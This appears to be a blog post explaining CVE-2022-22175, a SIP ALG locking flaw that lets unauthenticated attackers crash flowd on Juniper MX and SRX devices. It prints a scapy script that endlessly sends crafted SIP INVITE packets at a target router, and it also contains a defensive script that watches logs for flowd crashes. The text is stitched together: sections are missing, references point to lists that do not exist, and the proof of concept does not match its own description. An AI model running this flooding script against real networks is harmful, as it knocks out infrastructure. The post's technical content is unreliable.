There’s a dangerous vulnerability lurking in certain versions of Juniper's Junos OS, specifically on MX Series and SRX Series devices. It's called CVE-2022-22175. By simply sending specially-crafted SIP packets, unauthenticated attackers on your network can crash the flow processing daemon (flowd), resulting in a full Denial of Service (DoS) on affected devices. If the attack is repeated, your box stays knocked out. This post breaks down the what, how, and why—using clear language and real code snippets.
What Is CVE-2022-22175?
CVE-2022-22175 is an Improper Locking vulnerability found in the SIP Application Level Gateway (ALG) of Junos OS. When certain SIP messages are processed simultaneously, and SIP ALG is enabled, the device’s flowd daemon can crash.
How Does the Attack Work?
When SIP ALG is turned on, the Junos flowd process inspects and rewrites SIP traffic passing through the device. If an attacker sends specific SIP messages at the same time, Junos doesn't properly manage system locks—leading to a crash. No authentication or privilege escalation is needed!
The result?
Every time these packets are sent, your router's network traffic is disrupted, services go down, and critical infrastructure is held hostage by denial of service.
2. Crafting the SIP Packets
Here's a sample Python script using the scapy library to send SIP packets. (This is a proof-of-concept, provided for educational and defensive purposes only.)
```python
from scapy.all import IP, UDP, RandShort, send
import time

# Change these to match your network
JUNIPER_IP = "192.168.1.1"
SRC_IP = "192.168.1.100"
SIP_PORT = 5060

# Sample malicious SIP INVITE message
sip_payload = (
    'INVITE sip:bob@domain.com SIP/2.0\r\n'
    'Via: SIP/2.0/UDP attacker.example.com;branch=z9hG4bK776asdhds\r\n'
    'Max-Forwards: 70\r\n'
    'To: <sip:bob@domain.com>\r\n'
    'From: <sip:alice@evil.com>;tag=1928301774\r\n'
    'Call-ID: a84b4c76e66710@evil.com\r\n'
    'CSeq: 314159 INVITE\r\n'
    'Contact: <sip:alice@evil.com>\r\n'
    'Content-Length: 0\r\n'
    '\r\n'
)


# Flood device with packets
def attack():
    pkt = IP(src=SRC_IP, dst=JUNIPER_IP) / UDP(sport=RandShort(), dport=SIP_PORT) / sip_payload
    while True:
        send(pkt, verbose=False)
        time.sleep(0.1)  # Throttle packets to avoid overwhelming the network


if __name__ == '__main__':
    attack()
```
3. Sending Simultaneous Messages
Multiple attackers (or just multiple threads) can send different types of SIP requests, such as INVITE, BYE, and REGISTER, at the same time to maximize the likelihood of triggering the race condition in the SIP ALG handler.
Or view /var/log/messages for flowd errors.
Go to a safe version (see list above).
- Juniper download page (Customer account required)
Monitor your routers for crashes: Automate alerting on flowd restarts and core dumps.
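One way to automate the flowd monitoring suggested above, as an added example rather than code from the original post or from Juniper. The log lines are constructed, and the crash and restart patterns are assumptions to adjust to the messages your devices actually write to /var/log/messages.

```python
import re
from datetime import datetime, timedelta

# Assumed indicators; tune these to the messages your own devices emit.
KINDS = {
    "crash": re.compile(r"core dumped|terminated by signal", re.I),
    "restart": re.compile(r"\brestart", re.I),
}

# Constructed sample in classic BSD syslog layout (not captured Junos output).
SAMPLE_LOG = """\
Jan 20 10:00:01 srx1 sshd[411]: Accepted publickey for admin
Jan 20 10:02:13 srx1 init: flowd (PID 1520) terminated by signal number 11. Core dumped!
Jan 20 10:02:15 srx1 init: flowd (PID 1877) restarted
Jan 20 10:03:40 srx1 init: flowd (PID 1877) terminated by signal number 11. Core dumped!
Jan 20 10:30:00 srx1 mgd[900]: UI_COMMIT: user admin requested commit
Jan 20 11:45:09 srx2 init: flowd (PID 700) terminated by signal number 6. Core dumped!
"""

def flowd_events(text, year=2022):
    """Return [(timestamp, host, kind)] for lines that mention flowd and an indicator."""
    events = []
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5 or "flowd" not in parts[4]:
            continue
        kind = next((k for k, rx in KINDS.items() if rx.search(parts[4])), None)
        if kind is None:
            continue
        # Syslog omits the year, so it is supplied by the caller.
        ts = datetime.strptime(f"{year} {' '.join(parts[:3])}", "%Y %b %d %H:%M:%S")
        events.append((ts, parts[3], kind))
    return events

def repeated_crash_hosts(text, threshold=2, window=timedelta(minutes=10)):
    """Hosts with at least `threshold` flowd crashes inside one time window."""
    crashes = {}
    for ts, host, kind in flowd_events(text):
        if kind == "crash":
            crashes.setdefault(host, []).append(ts)
    flagged = []
    for host, stamps in sorted(crashes.items()):
        stamps.sort()
        pairs = zip(stamps, stamps[threshold - 1:])
        if any(last - first <= window for first, last in pairs):
            flagged.append(host)
    return flagged

if __name__ == "__main__":
    for ts, host, kind in flowd_events(SAMPLE_LOG):
        print(f"{ts:%b %d %H:%M:%S} {host} flowd {kind}")
    print("repeated crashes:", repeated_crash_hosts(SAMPLE_LOG))
```

A single crash event is worth an alert on its own; the repeated-crash check separates a one-off fault from the sustained outage the post describes.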
Official Juniper Reference:
- JSA11269 Juniper Security Advisory
Other Resources
- NVD entry for CVE-2022-22175
- Understanding SIP ALG
Conclusion: Why Does This Matter?
This isn’t your average bug. With just a basic SIP packet generator and a little network access, any user can knock out critical network gear until you upgrade and protect your systems. If you use Juniper MX or SRX and run VoIP, check your versions and settings right now! Don’t be the next headline.
If you found this post helpful, please share and spread the word—there are still plenty of unpatched routers out there!
Stay safe and patch early.
Timeline
Published on: 01/19/2022 01:15:00 UTC
Last modified on: 01/26/2022 18:38:00 UTC